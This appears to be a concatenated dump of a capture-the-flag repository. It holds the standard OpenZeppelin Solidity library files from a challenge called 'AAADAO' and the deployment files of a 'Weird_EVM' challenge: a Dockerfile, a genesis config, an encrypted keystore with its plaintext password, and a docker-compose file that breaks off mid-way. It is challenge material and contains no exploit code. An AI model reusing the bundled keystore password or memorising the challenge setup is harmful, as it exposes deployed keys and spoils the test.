Non-Fungible Token Standard, optional enumeration extension 10 | * @dev See https://eips.ethereum.org/EIPS/eip-721 11 | */ 12 | interface IERC721Enumerable is IERC721 { 13 | /** 14 | * @dev Returns the total amount of tokens stored by the contract. 15 | */ 16 | function totalSupply() external view returns (uint256); 17 | 18 | /** 19 | * @dev Returns a token ID owned by `owner` at a given `index` of its token list. 20 | * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. 21 | */ 22 | function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); 23 | 24 | /** 25 | * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. 26 | * Use along with {totalSupply} to enumerate all tokens. 27 | */ 28 | function tokenByIndex(uint256 index) external view returns (uint256); 29 | } 30 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/IERC721Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC721.sol"; 7 | 8 | /** 9 | * @title ERC-721 Non-Fungible Token Standard, optional metadata extension 10 | * @dev See https://eips.ethereum.org/EIPS/eip-721 11 | */ 12 | interface IERC721Metadata is IERC721 { 13 | /** 14 | * @dev Returns the token collection name. 15 | */ 16 | function name() external view returns (string memory); 17 | 18 | /** 19 | * @dev Returns the token collection symbol. 20 | */ 21 | function symbol() external view returns (string memory); 22 | 23 | /** 24 | * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. 25 | */ 26 | function tokenURI(uint256 tokenId) external view returns (string memory); 27 | } 28 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/draft-ERC721Votes.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/extensions/draft-ERC721Votes.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../../governance/utils/Votes.sol"; 8 | 9 | /** 10 | * @dev Extension of ERC721 to support voting and delegation as implemented by {Votes}, where each individual NFT counts 11 | * as 1 vote unit. 12 | * 13 | * Tokens do not count as votes until they are delegated, because votes must be tracked which incurs an additional cost 14 | * on every transfer. Token holders can either delegate to a trusted representative who will decide how to make use of 15 | * the votes in governance decisions, or they can delegate to themselves to be their own representative. 16 | * 17 | * _Available since v4.5._ 18 | */ 19 | abstract contract ERC721Votes is ERC721, Votes { 20 | /** 21 | * @dev Adjusts votes when tokens are transferred. 22 | * 23 | * Emits a {Votes-DelegateVotesChanged} event. 24 | */ 25 | function _afterTokenTransfer( 26 | address from, 27 | address to, 28 | uint256 tokenId 29 | ) internal virtual override { 30 | _transferVotingUnits(from, to, 1); 31 | super._afterTokenTransfer(from, to, tokenId); 32 | } 33 | 34 | /** 35 | * @dev Returns the balance of `account`. 36 | */ 37 | function _getVotingUnits(address account) internal view virtual override returns (uint256) { 38 | return balanceOf(account); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/presets/README.md: -------------------------------------------------------------------------------- 1 | Contract presets are now deprecated in favor of [Contracts Wizard](https://wizard.openzeppelin.com/) as a more powerful alternative. 2 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/utils/ERC721Holder.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/utils/ERC721Holder.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC721Receiver.sol"; 7 | 8 | /** 9 | * @dev Implementation of the {IERC721Receiver} interface. 10 | * 11 | * Accepts all token transfers. 12 | * Make sure the contract is able to use its token with {IERC721-safeTransferFrom}, {IERC721-approve} or {IERC721-setApprovalForAll}. 13 | */ 14 | contract ERC721Holder is IERC721Receiver { 15 | /** 16 | * @dev See {IERC721Receiver-onERC721Received}. 17 | * 18 | * Always returns `IERC721Receiver.onERC721Received.selector`. 19 | */ 20 | function onERC721Received( 21 | address, 22 | address, 23 | uint256, 24 | bytes memory 25 | ) public virtual override returns (bytes4) { 26 | return this.onERC721Received.selector; 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/IERC777Recipient.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC777/IERC777Recipient.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC777TokensRecipient standard as defined in the EIP. 8 | * 9 | * Accounts can be notified of {IERC777} tokens being sent to them by having a 10 | * contract implement this interface (contract holders can be their own 11 | * implementer) and registering it on the 12 | * https://eips.ethereum.org/EIPS/eip-1820[ERC1820 global registry]. 13 | * 14 | * See {IERC1820Registry} and {ERC1820Implementer}. 15 | */ 16 | interface IERC777Recipient { 17 | /** 18 | * @dev Called by an {IERC777} token contract whenever tokens are being 19 | * moved or created into a registered account (`to`). The type of operation 20 | * is conveyed by `from` being the zero address or not. 21 | * 22 | * This call occurs _after_ the token contract's state is updated, so 23 | * {IERC777-balanceOf}, etc., can be used to query the post-operation state. 24 | * 25 | * This function may revert to prevent the operation from being executed. 26 | */ 27 | function tokensReceived( 28 | address operator, 29 | address from, 30 | address to, 31 | uint256 amount, 32 | bytes calldata userData, 33 | bytes calldata operatorData 34 | ) external; 35 | } 36 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/IERC777Sender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC777/IERC777Sender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC777TokensSender standard as defined in the EIP. 8 | * 9 | * {IERC777} Token holders can be notified of operations performed on their 10 | * tokens by having a contract implement this interface (contract holders can be 11 | * their own implementer) and registering it on the 12 | * https://eips.ethereum.org/EIPS/eip-1820[ERC1820 global registry]. 13 | * 14 | * See {IERC1820Registry} and {ERC1820Implementer}. 15 | */ 16 | interface IERC777Sender { 17 | /** 18 | * @dev Called by an {IERC777} token contract whenever a registered holder's 19 | * (`from`) tokens are about to be moved or destroyed. The type of operation 20 | * is conveyed by `to` being the zero address or not. 21 | * 22 | * This call occurs _before_ the token contract's state is updated, so 23 | * {IERC777-balanceOf}, etc., can be used to query the pre-operation state. 24 | * 25 | * This function may revert to prevent the operation from being executed. 26 | */ 27 | function tokensToSend( 28 | address operator, 29 | address from, 30 | address to, 31 | uint256 amount, 32 | bytes calldata userData, 33 | bytes calldata operatorData 34 | ) external; 35 | } 36 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/README.adoc: -------------------------------------------------------------------------------- 1 | = ERC 777 2 | 3 | [.readme-notice] 4 | NOTE: This document is better viewed at https://docs.openzeppelin.com/contracts/api/token/erc777 5 | 6 | This set of interfaces and contracts are all related to the [ERC777 token standard](https://eips.ethereum.org/EIPS/eip-777). 7 | 8 | TIP: For an overview of ERC777 tokens and a walk through on how to create a token contract read our xref:ROOT:erc777.adoc[ERC777 guide]. 9 | 10 | The token behavior itself is implemented in the core contracts: {IERC777}, {ERC777}. 11 | 12 | Additionally there are interfaces used to develop contracts that react to token movements: {IERC777Sender}, {IERC777Recipient}. 13 | 14 | == Core 15 | 16 | {{IERC777}} 17 | 18 | {{ERC777}} 19 | 20 | == Hooks 21 | 22 | {{IERC777Sender}} 23 | 24 | {{IERC777Recipient}} 25 | 26 | == Presets 27 | 28 | These contracts are preconfigured combinations of features. They can be used through inheritance or as models to copy and paste their source code. 29 | 30 | {{ERC777PresetFixedSupply}} 31 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/presets/ERC777PresetFixedSupply.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC777/presets/ERC777PresetFixedSupply.sol) 3 | pragma solidity ^0.8.0; 4 | 5 | import "../ERC777.sol"; 6 | 7 | /** 8 | * @dev {ERC777} token, including: 9 | * 10 | * - Preminted initial supply 11 | * - No access control mechanism (for minting/pausing) and hence no governance 12 | * 13 | * _Available since v3.4._ 14 | */ 15 | contract ERC777PresetFixedSupply is ERC777 { 16 | /** 17 | * @dev Mints `initialSupply` amount of token and transfers them to `owner`. 18 | * 19 | * See {ERC777-constructor}. 20 | */ 21 | constructor( 22 | string memory name, 23 | string memory symbol, 24 | address[] memory defaultOperators, 25 | uint256 initialSupply, 26 | address owner 27 | ) ERC777(name, symbol, defaultOperators) { 28 | _mint(owner, initialSupply, "", ""); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/common/README.adoc: -------------------------------------------------------------------------------- 1 | = Common (Tokens) 2 | 3 | Functionality that is common to multiple token standards. 4 | 5 | * {ERC2981}: NFT Royalties compatible with both ERC721 and ERC1155. 6 | ** For ERC721 consider {ERC721Royalty} which clears the royalty information from storage on burn. 7 | 8 | == Contracts 9 | 10 | {{ERC2981}} 11 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Arrays.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/Arrays.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./math/Math.sol"; 7 | 8 | /** 9 | * @dev Collection of functions related to array types. 10 | */ 11 | library Arrays { 12 | /** 13 | * @dev Searches a sorted `array` and returns the first index that contains 14 | * a value greater or equal to `element`. If no such index exists (i.e. all 15 | * values in the array are strictly less than `element`), the array length is 16 | * returned. Time complexity O(log n). 17 | * 18 | * `array` is expected to be sorted in ascending order, and to contain no 19 | * repeated elements. 20 | */ 21 | function findUpperBound(uint256[] storage array, uint256 element) internal view returns (uint256) { 22 | if (array.length == 0) { 23 | return 0; 24 | } 25 | 26 | uint256 low = 0; 27 | uint256 high = array.length; 28 | 29 | while (low < high) { 30 | uint256 mid = Math.average(low, high); 31 | 32 | // Note that mid will always be strictly less than high (i.e. it will be a valid array index) 33 | // because Math.average rounds down (it does integer division with truncation). 34 | if (array[mid] > element) { 35 | high = mid; 36 | } else { 37 | low = mid + 1; 38 | } 39 | } 40 | 41 | // At this point `low` is the exclusive upper bound. We will return the inclusive upper bound. 42 | if (low > 0 && array[low - 1] == element) { 43 | return low - 1; 44 | } else { 45 | return low; 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Context.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Provides information about the current execution context, including the 8 | * sender of the transaction and its data. While these are generally available 9 | * via msg.sender and msg.data, they should not be accessed in such a direct 10 | * manner, since when dealing with meta-transactions the account sending and 11 | * paying for execution may not be the actual sender (as far as an application 12 | * is concerned). 13 | * 14 | * This contract is only required for intermediate, library-like contracts. 15 | */ 16 | abstract contract Context { 17 | function _msgSender() internal view virtual returns (address) { 18 | return msg.sender; 19 | } 20 | 21 | function _msgData() internal view virtual returns (bytes calldata) { 22 | return msg.data; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Counters.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/Counters.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @title Counters 8 | * @author Matt Condon (@shrugs) 9 | * @dev Provides counters that can only be incremented, decremented or reset. This can be used e.g. to track the number 10 | * of elements in a mapping, issuing ERC721 ids, or counting request ids. 11 | * 12 | * Include with `using Counters for Counters.Counter;` 13 | */ 14 | library Counters { 15 | struct Counter { 16 | // This variable should never be directly accessed by users of the library: interactions must be restricted to 17 | // the library's function. As of Solidity v0.5.2, this cannot be enforced, though there is a proposal to add 18 | // this feature: see https://github.com/ethereum/solidity/issues/4637 19 | uint256 _value; // default: 0 20 | } 21 | 22 | function current(Counter storage counter) internal view returns (uint256) { 23 | return counter._value; 24 | } 25 | 26 | function increment(Counter storage counter) internal { 27 | unchecked { 28 | counter._value += 1; 29 | } 30 | } 31 | 32 | function decrement(Counter storage counter) internal { 33 | uint256 value = counter._value; 34 | require(value > 0, "Counter: decrement overflow"); 35 | unchecked { 36 | counter._value = value - 1; 37 | } 38 | } 39 | 40 | function reset(Counter storage counter) internal { 41 | counter._value = 0; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Multicall.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (utils/Multicall.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./Address.sol"; 7 | 8 | /** 9 | * @dev Provides a function to batch together multiple calls in a single external call. 10 | * 11 | * _Available since v4.1._ 12 | */ 13 | abstract contract Multicall { 14 | /** 15 | * @dev Receives and executes a batch of function calls on this contract. 16 | */ 17 | function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) { 18 | results = new bytes[](data.length); 19 | for (uint256 i = 0; i < data.length; i++) { 20 | results[i] = Address.functionDelegateCall(address(this), data[i]); 21 | } 22 | return results; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/escrow/ConditionalEscrow.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/escrow/ConditionalEscrow.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./Escrow.sol"; 7 | 8 | /** 9 | * @title ConditionalEscrow 10 | * @dev Base abstract escrow to only allow withdrawal if a condition is met. 11 | * @dev Intended usage: See {Escrow}. Same usage guidelines apply here. 12 | */ 13 | abstract contract ConditionalEscrow is Escrow { 14 | /** 15 | * @dev Returns whether an address is allowed to withdraw their funds. To be 16 | * implemented by derived contracts. 17 | * @param payee The destination address of the funds. 18 | */ 19 | function withdrawalAllowed(address payee) public view virtual returns (bool); 20 | 21 | function withdraw(address payable payee) public virtual override { 22 | require(withdrawalAllowed(payee), "ConditionalEscrow: payee is not allowed to withdraw"); 23 | super.withdraw(payee); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/ERC165.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC165.sol"; 7 | 8 | /** 9 | * @dev Implementation of the {IERC165} interface. 10 | * 11 | * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check 12 | * for the additional interface id that will be supported. For example: 13 | * 14 | * ```solidity 15 | * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { 16 | * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); 17 | * } 18 | * ``` 19 | * 20 | * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. 21 | */ 22 | abstract contract ERC165 is IERC165 { 23 | /** 24 | * @dev See {IERC165-supportsInterface}. 25 | */ 26 | function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { 27 | return interfaceId == type(IERC165).interfaceId; 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/ERC165Storage.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165Storage.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./ERC165.sol"; 7 | 8 | /** 9 | * @dev Storage based implementation of the {IERC165} interface. 10 | * 11 | * Contracts may inherit from this and call {_registerInterface} to declare 12 | * their support of an interface. 13 | */ 14 | abstract contract ERC165Storage is ERC165 { 15 | /** 16 | * @dev Mapping of interface ids to whether or not it's supported. 17 | */ 18 | mapping(bytes4 => bool) private _supportedInterfaces; 19 | 20 | /** 21 | * @dev See {IERC165-supportsInterface}. 22 | */ 23 | function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { 24 | return super.supportsInterface(interfaceId) || _supportedInterfaces[interfaceId]; 25 | } 26 | 27 | /** 28 | * @dev Registers the contract as an implementer of the interface defined by 29 | * `interfaceId`. Support of the actual ERC165 interface is automatic and 30 | * registering its interface id is not required. 31 | * 32 | * See {IERC165-supportsInterface}. 33 | * 34 | * Requirements: 35 | * 36 | * - `interfaceId` cannot be the ERC165 invalid interface (`0xffffffff`). 37 | */ 38 | function _registerInterface(bytes4 interfaceId) internal virtual { 39 | require(interfaceId != 0xffffffff, "ERC165: invalid interface id"); 40 | _supportedInterfaces[interfaceId] = true; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/ERC1820Implementer.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC1820Implementer.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC1820Implementer.sol"; 7 | 8 | /** 9 | * @dev Implementation of the {IERC1820Implementer} interface. 10 | * 11 | * Contracts may inherit from this and call {_registerInterfaceForAddress} to 12 | * declare their willingness to be implementers. 13 | * {IERC1820Registry-setInterfaceImplementer} should then be called for the 14 | * registration to be complete. 15 | */ 16 | contract ERC1820Implementer is IERC1820Implementer { 17 | bytes32 private constant _ERC1820_ACCEPT_MAGIC = keccak256("ERC1820_ACCEPT_MAGIC"); 18 | 19 | mapping(bytes32 => mapping(address => bool)) private _supportedInterfaces; 20 | 21 | /** 22 | * @dev See {IERC1820Implementer-canImplementInterfaceForAddress}. 23 | */ 24 | function canImplementInterfaceForAddress(bytes32 interfaceHash, address account) 25 | public 26 | view 27 | virtual 28 | override 29 | returns (bytes32) 30 | { 31 | return _supportedInterfaces[interfaceHash][account] ? _ERC1820_ACCEPT_MAGIC : bytes32(0x00); 32 | } 33 | 34 | /** 35 | * @dev Declares the contract as willing to be an implementer of 36 | * `interfaceHash` for `account`. 37 | * 38 | * See {IERC1820Registry-setInterfaceImplementer} and 39 | * {IERC1820Registry-interfaceHash}. 40 | */ 41 | function _registerInterfaceForAddress(bytes32 interfaceHash, address account) internal virtual { 42 | _supportedInterfaces[interfaceHash][account] = true; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/IERC165.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC165 standard, as defined in the 8 | * https://eips.ethereum.org/EIPS/eip-165[EIP]. 9 | * 10 | * Implementers can declare support of contract interfaces, which can then be 11 | * queried by others ({ERC165Checker}). 12 | * 13 | * For an implementation, see {ERC165}. 14 | */ 15 | interface IERC165 { 16 | /** 17 | * @dev Returns true if this contract implements the interface defined by 18 | * `interfaceId`. See the corresponding 19 | * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] 20 | * to learn more about how these ids are created. 21 | * 22 | * This function call must use less than 30 000 gas. 23 | */ 24 | function supportsInterface(bytes4 interfaceId) external view returns (bool); 25 | } 26 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/IERC1820Implementer.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC1820Implementer.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface for an ERC1820 implementer, as defined in the 8 | * https://eips.ethereum.org/EIPS/eip-1820#interface-implementation-erc1820implementerinterface[EIP]. 9 | * Used by contracts that will be registered as implementers in the 10 | * {IERC1820Registry}. 11 | */ 12 | interface IERC1820Implementer { 13 | /** 14 | * @dev Returns a special value (`ERC1820_ACCEPT_MAGIC`) if this contract 15 | * implements `interfaceHash` for `account`. 16 | * 17 | * See {IERC1820Registry-setInterfaceImplementer}. 18 | */ 19 | function canImplementInterfaceForAddress(bytes32 interfaceHash, address account) external view returns (bytes32); 20 | } 21 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/math/Math.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (utils/math/Math.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Standard math utilities missing in the Solidity language. 8 | */ 9 | library Math { 10 | /** 11 | * @dev Returns the largest of two numbers. 12 | */ 13 | function max(uint256 a, uint256 b) internal pure returns (uint256) { 14 | return a >= b ? a : b; 15 | } 16 | 17 | /** 18 | * @dev Returns the smallest of two numbers. 19 | */ 20 | function min(uint256 a, uint256 b) internal pure returns (uint256) { 21 | return a < b ? a : b; 22 | } 23 | 24 | /** 25 | * @dev Returns the average of two numbers. The result is rounded towards 26 | * zero. 27 | */ 28 | function average(uint256 a, uint256 b) internal pure returns (uint256) { 29 | // (a + b) / 2 can overflow. 30 | return (a & b) + (a ^ b) / 2; 31 | } 32 | 33 | /** 34 | * @dev Returns the ceiling of the division of two numbers. 35 | * 36 | * This differs from standard division with `/` in that it rounds up instead 37 | * of rounding down. 38 | */ 39 | function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) { 40 | // (a + b - 1) / b can overflow on addition, so we distribute. 41 | return a / b + (a % b == 0 ? 0 : 1); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/math/SignedMath.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (utils/math/SignedMath.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Standard signed math utilities missing in the Solidity language. 8 | */ 9 | library SignedMath { 10 | /** 11 | * @dev Returns the largest of two signed numbers. 12 | */ 13 | function max(int256 a, int256 b) internal pure returns (int256) { 14 | return a >= b ? a : b; 15 | } 16 | 17 | /** 18 | * @dev Returns the smallest of two signed numbers. 19 | */ 20 | function min(int256 a, int256 b) internal pure returns (int256) { 21 | return a < b ? a : b; 22 | } 23 | 24 | /** 25 | * @dev Returns the average of two signed numbers without overflow. 26 | * The result is rounded towards zero. 27 | */ 28 | function average(int256 a, int256 b) internal pure returns (int256) { 29 | // Formula from the book "Hacker's Delight" 30 | int256 x = (a & b) + ((a ^ b) >> 1); 31 | return x + (int256(uint256(x) >> 255) & (a ^ b)); 32 | } 33 | 34 | /** 35 | * @dev Returns the absolute unsigned value of a signed value. 36 | */ 37 | function abs(int256 n) internal pure returns (uint256) { 38 | unchecked { 39 | // must be unchecked in order to support `n = type(int256).min` 40 | return uint256(n >= 0 ? n : -n); 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/structs/BitMaps.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/structs/BitMaps.sol) 3 | pragma solidity ^0.8.0; 4 | 5 | /** 6 | * @dev Library for managing uint256 to bool mapping in a compact and efficient way, providing the keys are sequential. 7 | * Largelly inspired by Uniswap's https://github.com/Uniswap/merkle-distributor/blob/master/contracts/MerkleDistributor.sol[merkle-distributor]. 8 | */ 9 | library BitMaps { 10 | struct BitMap { 11 | mapping(uint256 => uint256) _data; 12 | } 13 | 14 | /** 15 | * @dev Returns whether the bit at `index` is set. 16 | */ 17 | function get(BitMap storage bitmap, uint256 index) internal view returns (bool) { 18 | uint256 bucket = index >> 8; 19 | uint256 mask = 1 << (index & 0xff); 20 | return bitmap._data[bucket] & mask != 0; 21 | } 22 | 23 | /** 24 | * @dev Sets the bit at `index` to the boolean `value`. 25 | */ 26 | function setTo( 27 | BitMap storage bitmap, 28 | uint256 index, 29 | bool value 30 | ) internal { 31 | if (value) { 32 | set(bitmap, index); 33 | } else { 34 | unset(bitmap, index); 35 | } 36 | } 37 | 38 | /** 39 | * @dev Sets the bit at `index`. 40 | */ 41 | function set(BitMap storage bitmap, uint256 index) internal { 42 | uint256 bucket = index >> 8; 43 | uint256 mask = 1 << (index & 0xff); 44 | bitmap._data[bucket] |= mask; 45 | } 46 | 47 | /** 48 | * @dev Unsets the bit at `index`. 49 | */ 50 | function unset(BitMap storage bitmap, uint256 index) internal { 51 | uint256 bucket = index >> 8; 52 | uint256 mask = 1 << (index & 0xff); 53 | bitmap._data[bucket] &= ~mask; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | COPY entrypoint.sh /entrypoint.sh 4 | COPY geth /geth 5 | RUN chmod +x /entrypoint.sh /geth 6 | 7 | EXPOSE 8545 8 | 9 | ENTRYPOINT ["/entrypoint.sh"] 10 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 ChainFlag 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/config/genesis.json: -------------------------------------------------------------------------------- 1 | { 2 | "config": { 3 | "chainId": 45267, 4 | "homesteadBlock": 0, 5 | "eip150Block": 0, 6 | "eip150Hash": "0x0000000000000000000000000000000000000000000000000000000000000000", 7 | "eip155Block": 0, 8 | "eip158Block": 0, 9 | "byzantiumBlock": 0, 10 | "constantinopleBlock": 0, 11 | "petersburgBlock": 0, 12 | "istanbulBlock": 0, 13 | "berlinBlock": 0, 14 | "londonBlock": 0, 15 | "clique": { 16 | "period": 5, 17 | "epoch": 30000 18 | } 19 | }, 20 | "nonce": "0x0", 21 | "timestamp": "0x609ac710", 22 | "extraData": "0x0000000000000000000000000000000000000000000000000000000000000000639A0408b8F8997BB80Af7Ef373Df92C851C77420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", 23 | "gasLimit": "0x47b760", 24 | "difficulty": "0x1", 25 | "mixHash": "0x0000000000000000000000000000000000000000000000000000000000000000", 26 | "coinbase": "0x0000000000000000000000000000000000000000", 27 | "alloc": { 28 | "639A0408b8F8997BB80Af7Ef373Df92C851C7742": { 29 | "balance": "0x200000000000000000000000000000000000000000000000000000000000000" 30 | } 31 | }, 32 | "number": "0x0", 33 | "gasUsed": "0x0", 34 | "parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000" 35 | } -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/config/keystore/UTC--2022-06-21T09-05-49.757555100Z--639a0408b8f8997bb80af7ef373df92c851c7742: -------------------------------------------------------------------------------- 1 | {"address":"639a0408b8f8997bb80af7ef373df92c851c7742","crypto":{"cipher":"aes-128-ctr","ciphertext":"09b891b6780c499e84c3984c8525acdba9f5348d2500db9f4b22d314bcce4058","cipherparams":{"iv":"64ca0cca4b7c95f37157b094c87237e6"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"6eb8165b002e7b0a3d2b6e02ac62677ed43e7fd9ef1de5e16bbae97dc883daa7"},"mac":"b6ae92b6feeb4f957cb2d2ece911a8a888cd7935dd1346108e3484eca903bed4"},"id":"d50929ac-19a9-4af3-a5aa-801dd7f413ac","version":3} -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/config/password.txt: -------------------------------------------------------------------------------- 1 | 43rt 3489rh389m58r934n7 5r 89weyhf890cwrf@#$@RED@#DRF@#RT@ V#5r cg3 487qxb -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | geth: 4 | build: . 5 | container_name: ethereum 6 | volumes: 7 | - ./config:/config 8 | - ./data:/data 9 | restart: always 10 | 11 | proxy: 12 | image: nginx:1.22-alpine 13 | container_name: rpcproxy 14 | ports: 15 | - "8545:8545" 16 | links: 17 | - geth 18 | volumes: 19 | - ./njs:/etc/nginx/njs 20 | - ./nginx.conf:/etc/nginx/nginx.conf 21 | depends_on: 22 | - geth 23 | restart: always 24 | 25 | challenge: 26 | build: ./eth-challenge-base 27 | container_name: challenge 28 